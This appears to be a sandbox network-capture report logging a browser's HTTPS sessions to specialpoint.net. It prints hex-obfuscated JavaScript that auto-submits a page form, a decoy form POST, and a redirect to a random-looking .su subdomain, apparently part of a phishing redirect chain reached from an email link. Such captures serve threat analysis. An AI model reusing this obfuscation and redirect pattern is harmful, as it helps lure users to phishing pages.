                                                                                                                                                                                                                                                                2024-08-12 13:23:18 UTC731INData Raw: 78 32 46 5c 78 32 46 5c 78 32 30 5c 78 34 33 5c 78 36 38 5c 78 36 35 5c 78 36 33 5c 78 36 42 5c 78 32 30 5c 78 36 39 5c 78 36 36 5c 78 32 30 5c 78 37 34 5c 78 36 38 5c 78 36 35 5c 78 32 30 5c 78 36 36 5c 78 36 46 5c 78 37 32 5c 78 36 44 5c 78 32 30 5c 78 36 35 5c 78 37 38 5c 78 36 39 5c 78 37 33 5c 78 37 34 5c 78 37 33 5c 78 32 30 5c 78 36 31 5c 78 36 45 5c 78 36 34 5c 78 32 30 5c 78 36 39 5c 78 36 36 5c 78 32 30 5c 78 36 39 5c 78 37 34 5c 78 32 30 5c 78 36 38 5c 78 36 31 5c 78 37 33 5c 78 32 30 5c 78 36 39 5c 78 36 45 5c 78 37 30 5c 78 37 35 5c 78 37 34 5c 78 32 30 5c 78 36 35 5c 78 36 43 5c 78 36 35 5c 78 36 44 5c 78 36 35 5c 78 36 45 5c 78 37 34 5c 78 37 33 5c 78 30 41 5c 78 36 39 5c 78 36 36 5c 78 32 30 5c 78 32 38 5c 78 36 36 5c 78 36 39 5c 78 37 32
                                                                                                                                                                                                                                                                Data Ascii: x2F\x2F\x20\x43\x68\x65\x63\x6B\x20\x69\x66\x20\x74\x68\x65\x20\x66\x6F\x72\x6D\x20\x65\x78\x69\x73\x74\x73\x20\x61\x6E\x64\x20\x69\x66\x20\x69\x74\x20\x68\x61\x73\x20\x69\x6E\x70\x75\x74\x20\x65\x6C\x65\x6D\x65\x6E\x74\x73\x0A\x69\x66\x20\x28\x66\x69\x72
                                                                                                                                                                                                                                                                2024-08-12 13:23:18 UTC1369INData Raw: 62 32 30 0d 0a 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 36 34 5c 78 36 46 5c 78 36 33 5c 78 37 35 5c 78 36 44 5c 78 36 35 5c 78 36 45 5c 78 37 34 5c 78 32 45 5c 78 36 36 5c 78 36 46 5c 78 37 32 5c 78 36 44 5c 78 37 33 5c 78 35 42 5c 78 33 30 5c 78 35 44 5c 78 32 45 5c 78 37 33 5c 78 37 35 5c 78 36 32 5c 78 36 44 5c 78 36 39 5c 78 37 34 5c 78 32 38
                                                                                                                                                                                                                                                                Data Ascii: b2020\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x66\x6F\x72\x6D\x73\x5B\x30\x5D\x2E\x73\x75\x62\x6D\x69\x74\x28
                                                                                                                                                                                                                                                                2024-08-12 13:23:18 UTC1369INData Raw: 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 37 44 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 32 30 5c 78 36 35 5c 78 36 43 5c 78 37 33 5c 78 36 35 5c 78 32 30 5c 78 37 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 36 39 5c
                                                                                                                                                                                                                                                                Data Ascii: 20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7D\x0A\x20\x20\x7D\x0A\x7D\x20\x65\x6C\x73\x65\x20\x7B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                14192.168.2.449844188.114.96.34437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:18 UTC1101OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Host: specialpoint.net
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                Content-Length: 22
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                X-Requested-TimeStamp-Expire:
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                X-Requested-TimeStamp-Combination:
                                                                                                                                                                                                                                                                X-Requested-Type-Combination: GET
                                                                                                                                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                X-Requested-Type: GET
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                PmrYpUI73comgmFlYjbZKdaNDWo: 31322835
                                                                                                                                                                                                                                                                X-Requested-TimeStamp:
                                                                                                                                                                                                                                                                X-Requested-with: XMLHttpRequest
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Origin: https://specialpoint.net
                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Referer: https://specialpoint.net/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                Cookie: 7kP2-qok0lQDSgS5QI_1bI1YJcI=FC4yW9_pqdYUTlZz8DToWRyTXJg; BfIXpQ8HLf2HlwQby-i5VYmY1UQ=1723468997; C0Pdmwq0diPL4zHheBbw87DvKQ0=1723555397; w1hY5oz7fIQPRVtBdM0Mqs-wkz8=apJT5sJ29sm__xnJuYb_3c5EIBc; T0n5cGT8ytj8Ccr65xXO6I_0njs=cRrl2AzWkJYyEFavDJ0CEiHqe8Y
                                                                                                                                                                                                                                                                2024-08-12 13:23:18 UTC22OUTData Raw: 6e 61 6d 65 31 3d 48 65 6e 72 79 26 6e 61 6d 65 32 3d 46 6f 72 64
                                                                                                                                                                                                                                                                Data Ascii: name1=Henry&name2=Ford
                                                                                                                                                                                                                                                                2024-08-12 13:23:18 UTC1286INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:18 GMT
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                Set-Cookie: T0n5cGT8ytj8Ccr65xXO6I_0njs=cRrl2AzWkJYyEFavDJ0CEiHqe8Y; path=/; expires=Tue, 13-Aug-24 13:23:18 GMT; Max-Age=86400;
                                                                                                                                                                                                                                                                Set-Cookie: _HFN_Wm0L5Mhhqk1oFNnI8cYVYc=1723468998; path=/; expires=Tue, 13-Aug-24 13:23:18 GMT; Max-Age=86400;
                                                                                                                                                                                                                                                                Set-Cookie: 8xSp-vytl8r8hR9WfQ4I6DyfqXs=1723555398; path=/; expires=Tue, 13-Aug-24 13:23:18 GMT; Max-Age=86400;
                                                                                                                                                                                                                                                                Set-Cookie: GHwRErz7w44NUJIP52zhojU3tp0=dxTf3kwwFhmU3kprsXZOOH7Q8OI; path=/; expires=Tue, 13-Aug-24 13:23:18 GMT; Max-Age=86400;
                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                Cache-Control: public, max-age=0 no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4b8eLJ0gHq9rni0%2BzC8MLKpjijOTx%2B0M2DuRICNXvu81kwtf5zDVnJ5Ws0u10SJZesEzdu4N1o2pz7AoI%2F4km34Lp08bkxguu8YsbkiWk4Ve00cLl6avcxwAIoC8dc07olaN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8b20c7783aeb72ab-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                15192.168.2.44984635.190.80.14437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:18 UTC531OUTOPTIONS /report/v4?s=KW3oVXcxkvcoRQ0j9z0gnf45ksoTwOh2Nq3ANLX6W2I709YOpnOYid8RDa8svUy8KahbG3kHYSFdiJ61qbAmvdEW7j%2BWyWNKZrGCmIhy0gZSRnbrMzyeeQri3kf8MfAT0J5l HTTP/1.1
                                                                                                                                                                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                Origin: https://specialpoint.net
                                                                                                                                                                                                                                                                Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                                Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:18 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                access-control-max-age: 86400
                                                                                                                                                                                                                                                                access-control-allow-methods: OPTIONS, POST
                                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                                access-control-allow-headers: content-length, content-type
                                                                                                                                                                                                                                                                date: Mon, 12 Aug 2024 13:23:18 GMT
                                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                16192.168.2.449847188.114.96.34437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:18 UTC1078OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                Host: specialpoint.net
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                Referer: https://specialpoint.net/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                Cookie: 7kP2-qok0lQDSgS5QI_1bI1YJcI=FC4yW9_pqdYUTlZz8DToWRyTXJg; BfIXpQ8HLf2HlwQby-i5VYmY1UQ=1723468997; C0Pdmwq0diPL4zHheBbw87DvKQ0=1723555397; w1hY5oz7fIQPRVtBdM0Mqs-wkz8=apJT5sJ29sm__xnJuYb_3c5EIBc; T0n5cGT8ytj8Ccr65xXO6I_0njs=cRrl2AzWkJYyEFavDJ0CEiHqe8Y; _HFN_Wm0L5Mhhqk1oFNnI8cYVYc=1723468998; 8xSp-vytl8r8hR9WfQ4I6DyfqXs=1723555398; GHwRErz7w44NUJIP52zhojU3tp0=dxTf3kwwFhmU3kprsXZOOH7Q8OI
                                                                                                                                                                                                                                                                2024-08-12 13:23:19 UTC770INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:19 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                Location: https://nKOc4.ancolabi.su/YOBEzWvY/
                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A1rCT0qdgmP6%2B0fHWnBBkr2cS8MIioWUaih1krjVMjxzyjkFSfeoSq7tws9x%2FYM5jOicAEAaeJ%2FIJmWwyWv70%2BBevRd5qzGsBUO%2BC6W1utzQC0X2u09CjgjvGonZa4vSv8wU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8b20c77b78bb435b-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                17192.168.2.44984935.190.80.14437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:19 UTC472OUTPOST /report/v4?s=KW3oVXcxkvcoRQ0j9z0gnf45ksoTwOh2Nq3ANLX6W2I709YOpnOYid8RDa8svUy8KahbG3kHYSFdiJ61qbAmvdEW7j%2BWyWNKZrGCmIhy0gZSRnbrMzyeeQri3kf8MfAT0J5l HTTP/1.1
                                                                                                                                                                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                Content-Length: 414
                                                                                                                                                                                                                                                                Content-Type: application/reports+json
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:19 UTC414OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 30 37 36 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 75 72 6c 36 2e 6d 61 69 6c 61 6e 79 6f 6e 65 2e 6e 65 74 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 35 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72
                                                                                                                                                                                                                                                                Data Ascii: [{"age":1,"body":{"elapsed_time":1076,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://url6.mailanyone.net/","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":503,"type":"http.error"},"type":"network-error","ur
                                                                                                                                                                                                                                                                2024-08-12 13:23:19 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                date: Mon, 12 Aug 2024 13:23:19 GMT
                                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                18192.168.2.449850188.114.96.34437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:19 UTC786OUTGET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1
                                                                                                                                                                                                                                                                Host: specialpoint.net
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                Cookie: 7kP2-qok0lQDSgS5QI_1bI1YJcI=FC4yW9_pqdYUTlZz8DToWRyTXJg; BfIXpQ8HLf2HlwQby-i5VYmY1UQ=1723468997; C0Pdmwq0diPL4zHheBbw87DvKQ0=1723555397; w1hY5oz7fIQPRVtBdM0Mqs-wkz8=apJT5sJ29sm__xnJuYb_3c5EIBc; T0n5cGT8ytj8Ccr65xXO6I_0njs=cRrl2AzWkJYyEFavDJ0CEiHqe8Y
                                                                                                                                                                                                                                                                2024-08-12 13:23:19 UTC705INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:19 GMT
                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                location: /cdn-cgi/challenge-platform/h/g/scripts/jsd/769ce3c24a3b/main.js?
                                                                                                                                                                                                                                                                cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=10800, public
                                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xUM5GhuGBPpFSstWLG%2Fn6mktMFm%2FYT9zp2BGKdb%2FT0Wj%2F1F6oRrCsLJP5oN1ipQJQgGM0LkDrN0wLr%2Fh2Ft8Qa%2BiMEHrGpY5K9b0i18wWHpO8PYcO%2BDRs04uZy20RNI4rbo9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8b20c77ec9220f6d-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                19192.168.2.449851188.114.96.34437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:20 UTC941OUTGET /cdn-cgi/challenge-platform/h/g/scripts/jsd/769ce3c24a3b/main.js? HTTP/1.1
                                                                                                                                                                                                                                                                Host: specialpoint.net
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                Cookie: 7kP2-qok0lQDSgS5QI_1bI1YJcI=FC4yW9_pqdYUTlZz8DToWRyTXJg; BfIXpQ8HLf2HlwQby-i5VYmY1UQ=1723468997; C0Pdmwq0diPL4zHheBbw87DvKQ0=1723555397; w1hY5oz7fIQPRVtBdM0Mqs-wkz8=apJT5sJ29sm__xnJuYb_3c5EIBc; T0n5cGT8ytj8Ccr65xXO6I_0njs=cRrl2AzWkJYyEFavDJ0CEiHqe8Y; _HFN_Wm0L5Mhhqk1oFNnI8cYVYc=1723468998; 8xSp-vytl8r8hR9WfQ4I6DyfqXs=1723555398; GHwRErz7w44NUJIP52zhojU3tp0=dxTf3kwwFhmU3kprsXZOOH7Q8OI
                                                                                                                                                                                                                                                                2024-08-12 13:23:20 UTC684INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:20 GMT
                                                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                Content-Length: 7775
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                cache-control: max-age=14400, stale-if-error=10800, stale-while-revalidate=10800, public
                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=48dSdz9ej9IdooLaczRaXe9%2F7v5nSoLVqSSeU1oa8WFT73MtJz2c2EfItFfyWaa45tQEomSepekTKXcps%2Fiimv%2BjtN1t8%2BKuXz%2B%2Blj%2BXblezMuZPNrcO7XZl4UGGyfsuiw9u"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8b20c7829bb50f90-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:20 UTC685INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 67 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 56 2c 67 2c 68 2c 6d 2c 6e 2c 78 2c 79 2c 41 29 7b 56 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 65 2c 55 2c 66 2c 43 29 7b 66 6f 72 28 55 3d 62 2c 66 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 43 3d 70 61 72 73 65 49 6e 74 28 55 28 33 37 39 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 55 28 33 38 30 29 29 2f 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 55 28 34 33 31 29 29 2f 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 34 31 33 29 29 2f 34 2b 70 61 72 73 65 49 6e 74 28 55 28 33 38 38 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 55 28 34 32 39 29 29 2f 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 55 28 33 35 33 29 29 2f 37 29 2b 70 61 72 73
                                                                                                                                                                                                                                                                Data Ascii: window._cf_chl_opt={cFPWv:'g'};~function(V,g,h,m,n,x,y,A){V=b,function(c,e,U,f,C){for(U=b,f=c();!![];)try{if(C=parseInt(U(379))/1+parseInt(U(380))/2*(-parseInt(U(431))/3)+-parseInt(U(413))/4+parseInt(U(388))/5+parseInt(U(429))/6*(-parseInt(U(353))/7)+pars
                                                                                                                                                                                                                                                                2024-08-12 13:23:20 UTC1369INData Raw: 29 5d 28 6e 65 77 20 43 5b 28 61 34 28 34 30 36 29 29 5d 28 48 29 29 3a 66 75 6e 63 74 69 6f 6e 28 4e 2c 61 35 2c 4f 29 7b 66 6f 72 28 61 35 3d 61 34 2c 4e 5b 61 35 28 34 33 32 29 5d 28 29 2c 4f 3d 30 3b 4f 3c 4e 5b 61 35 28 34 31 38 29 5d 3b 4e 5b 4f 2b 31 5d 3d 3d 3d 4e 5b 4f 5d 3f 4e 5b 61 35 28 34 30 37 29 5d 28 4f 2b 31 2c 31 29 3a 4f 2b 3d 31 29 3b 72 65 74 75 72 6e 20 4e 7d 28 48 29 2c 49 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 49 3d 49 5b 61 34 28 33 39 37 29 5d 5b 61 34 28 33 36 37 29 5d 28 49 29 2c 4a 3d 30 3b 4a 3c 48 5b 61 34 28 34 31 38 29 5d 3b 4b 3d 48 5b 4a 5d 2c 4c 3d 73 28 43 2c 44 2c 4b 29 2c 49 28 4c 29 3f 28 4d 3d 4c 3d 3d 3d 27 73 27 26 26 21 43 5b 61 34 28 33 38 39 29 5d 28 44 5b 4b 5d 29 2c 61 34 28 33 39
                                                                                                                                                                                                                                                                Data Ascii: )](new C[(a4(406))](H)):function(N,a5,O){for(a5=a4,N[a5(432)](),O=0;O<N[a5(418)];N[O+1]===N[O]?N[a5(407)](O+1,1):O+=1);return N}(H),I='nAsAaAb'.split('A'),I=I[a4(397)][a4(367)](I),J=0;J<H[a4(418)];K=H[J],L=s(C,D,K),I(L)?(M=L==='s'&&!C[a4(389)](D[K]),a4(39
